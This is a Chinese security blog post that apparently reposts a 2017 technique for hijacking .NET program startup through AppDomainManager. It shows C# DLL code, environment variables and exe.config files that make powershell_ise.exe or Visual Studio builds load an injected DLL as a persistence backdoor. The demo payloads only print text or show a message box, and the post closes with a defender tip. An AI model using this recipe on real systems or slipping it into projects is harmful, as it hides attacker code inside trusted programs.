AppDomainManager后门的实现思路

简介: 本文讲的是AppDomainManager后门的实现思路,从Casey Smith@subTee学到的一个技巧:针对.Net程序,通过修改AppDomainManager能够劫持.Net程序的启动过程。
本文讲的是 AppDomainManager后门的实现思路

0x00 前言

从Casey Smith@subTee学到的一个技巧:针对.Net程序,通过修改AppDomainManager能够劫持.Net程序的启动过程。 
如果劫持了系统常见.Net程序如powershell.exe的启动过程,向其添加payload,就能实现一种被动的后门触发机制。

0x01 简介

本文将要介绍以下内容:

劫持自己开发的.Net程序

劫持系统.Net程序powershell_ise.exe

一种针对Visual Studio的利用思路

0x02 相关概念

CLR:

全称Common Language Runtime(公共语言运行库),是一个可由多种编程语言使用的运行环境。

CLR是.NET Framework的主要执行引擎,作用之一是监视程序的运行:

  • 在CLR监视之下运行的程序属于“托管的”(managed)代码

  • 不在CLR之下、直接在裸机上运行的应用或者组件属于“非托管的”(unmanaged)的代码

对于在CLR监视之下的程序,程序启动的初始化过程可参考如下链接:

http://mattwarren.org/2017/02/07/The-68-things-the-CLR-does-before-executing-a-single-line-of-your-code/

值得注意的地方:

如果能从程序启动的初始化过程中找到一个可供利用的位置,在程序启动之前加载我们自己的代码,那么就可以“滥用”CLR的功能,实现对程序的劫持

更理想的情况下:

如果可被劫持的程序是一个系统常用程序,随开机自启动,那么,这个方法就能作为一个持续性后门

下面介绍Casey Smith@subTee分享的后门思路:AppDomainManager

0x03 劫持自己开发的.Net程序

注:

代码引用自:http://subt0x10.blogspot.com/2017/06/attacking-clr-appdomainmanager-injection.html

1、编写示例程序

使用Visual Studio,选择c#开发环境,新建控制台应用程序,工程名:program,代码如下:

using System;

public class Program
{
    public static void Main()
    {
        Console.WriteLine("Inside the App");
    }
}

编译生成program.exe

程序运行如下图

AppDomainManager后门的实现思路

2、编写payload Dll

选择c#开发环境,新建类库,工程名:DomainManager,代码如下:

using System;

namespace DomainManager
{
   public class InjectedDomainManager : AppDomainManager
   {
       public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
       
{
           base.InitializeNewDomain(appDomainInfo);
           Console.WriteLine("Blah From AppMgr");
       }
   }
}

编译生成DomainManager.dll

3、设置AppDomainManager劫持程序启动

将DomainManager.dll放于同级目录

方法1:

cmd设置环境变量:

set APPDOMAIN_MANAGER_ASM=DomainManager, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null

set APPDOMAIN_MANAGER_TYPE=DomainManager.InjectedDomainManager

执行program.exe,通过查看回显,发现DomainManager.dll先于program.exe执行

成功实现劫持,完整操作如下图

AppDomainManager后门的实现思路

注:

注意比较执行顺序

通过cmd设置环境变量的方法只会作用于当前cmd,不够通用

方法2:

更加通用的方法:配置config文件

新建program.exe.config,内容如下:

<?xml version="1.0" encoding="utf-8"?>
<configuration>
 <startup>
   <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0"/>
 </startup>
   <runtime>
     <appDomainManagerType value="DomainManager.InjectedDomainManager" />
     <appDomainManagerAssembly
        value="DomainManager, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" />

   </runtime>
</configuration>

注:

config文件命名格式:exe+.config

成功实现劫持,完整操作如下图

AppDomainManager后门的实现思路

0x04 劫持系统.Net程序powershell_ise.exe

接下来,需要找到可供利用的系统.Net程序,尝试实现持久性后门

这里选取powershell_ise.exe作为演示

注:

powershell_ise.exe:全称Windows PowerShell Integrated Scripting Environment(集成脚本环境)

图形界面,主要用于编写和调试powershell脚本

操作界面如下图

AppDomainManager后门的实现思路

为了便于演示,我们需要修改工程DomainManager,使其在运行时弹框

1、添加引用

工程-右键-添加引用,选择System.Windows.Forms

如下图

AppDomainManager后门的实现思路

代码修改如下:

using System;
using System.Windows.Forms;
namespace DomainManager
{
   public class InjectedDomainManager : AppDomainManager
   {
       public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
       
{
           base.InitializeNewDomain(appDomainInfo);
           Console.WriteLine("Blah From AppMgr");
           MessageBox.Show("1");
       }
   }
}

重新编译生成DomainManager.dll

2、测试

劫持program.exe成功,如下图

AppDomainManager后门的实现思路

劫持powershell_ise.exe:

(1) 测试test目录

将powershell_ise.exe复制到c:test

在同级目录新建powershell_ise.exe.config,config文件可作适当精简,精简后的内容如下:

<?xml version="1.0"?>
<configuration>
 <startup>
   <supportedRuntime version="v4.0" />
 </startup>
   <runtime>
     <appDomainManagerType value="DomainManager.InjectedDomainManager" />
     <appDomainManagerAssembly value="DomainManager" />
   </runtime>
</configuration>

c:test目录下启动powershell_ise.exe

成功劫持powershell_ise.exe

(2)测试powershell_ise.exe默认目录

路径如下:

C:WindowsSystem32WindowsPowerShellv1.0

需要管理员权限,在默认目录创建劫持文件DomainManager.dll和powershell_ise.exe.config

编译任意powershell脚本,默认启动powershell_ise.exe,成功劫持

完整操作如下图

AppDomainManager后门的实现思路

0x05 一种针对Visual Studio的利用思路

对于Visual Studio的c#工程,在工程目录下默认存在文件App.config,内容如下:

<?xml version="1.0" encoding="utf-8" ?>
<configuration>
   <startup>
       <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />
   </startup>
</configuration>

如果对其修改,添加劫持功能,那么在编译程序时,也会同步修改bin目录下默认生成的config文件

App.config修改如下:

<?xml version="1.0" encoding="utf-8" ?>
<configuration>
   <startup>
       <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />
   </startup>
   <runtime>
     <appDomainManagerType value="DomainManager.InjectedDomainManager" />
     <appDomainManagerAssembly value="DomainManager" />
   </runtime>
</configuration>

编译程序,bin目录下的config文件也被修改,如下图

AppDomainManager后门的实现思路

如果在bin目录也放置DomainManager.dll,那么在程序启动时会被劫持,如下图

AppDomainManager后门的实现思路

0x06 小结

本文介绍了一种通过修改AppDomainManager实现的被动后门触发机制,分析了利用思路,站在防御者的角度,只需要留意.Net程序同级目录下的config文件就好。




原文发布时间为:2017年6月18日
本文作者:3gstudent 
本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。
目录
相关文章
|
11月前
|
存储 JavaScript 数据安全/隐私保护
babycrypt 自己出的第一道逆向题目 WP
babycrypt 自己出的第一道逆向题目 WP
32 1
|
11月前
|
安全 网络安全 数据库
网站攻击思路
最近一直在忙着项目,公众号也有很久没更新了,在此我给大家深表歉意。毕竟大三狗了。下半年就要滚蛋实习了。然后就在搞点项目,应聘的时候多一点竞争力。废话少说,直接进入正题。
|
12月前
Potato土豆提权工具绕过防护思路-1
Potato土豆提权工具绕过防护思路-1
145 0
|
安全 数据安全/隐私保护
网站渗透思路总结
网站渗透思路总结
|
存储 安全 中间件
网站漏扫服务换个思路提高渗透测试效率
在渗透测试过程中,我们可以通过插件识别类型后,使用漏洞脚本对特定系统进行模糊。在这里,笔者将与大家分享漏洞POC验证系统的设计和研究思路。在系统开发之初,选用了分布式平台设计架构。后来因为考虑到与分布式资产扫描平台兼容的接口,最后理解了耦合机制,彻底变成了单机版。首先我们可以看到这个地方没有单独设计web管理端,只能通过命令行调度。但是,在设计中,守护进程restapi是保留的,它可以接受来自第三方平台的调度请求。插件模块调用方面,主要有三个模块:流行的漏洞插件,主要用于重现常见的手工测试方法和一些团队发现的内部漏洞。密码漏洞插件:主要包括端口、中间件、未授权应用和弱密码漏洞,包括弱密码字典。
235 0
网站漏扫服务换个思路提高渗透测试效率
|
安全 数据库 数据安全/隐私保护
|
Shell 网络安全 开发工具
|
应用服务中间件 PHP Apache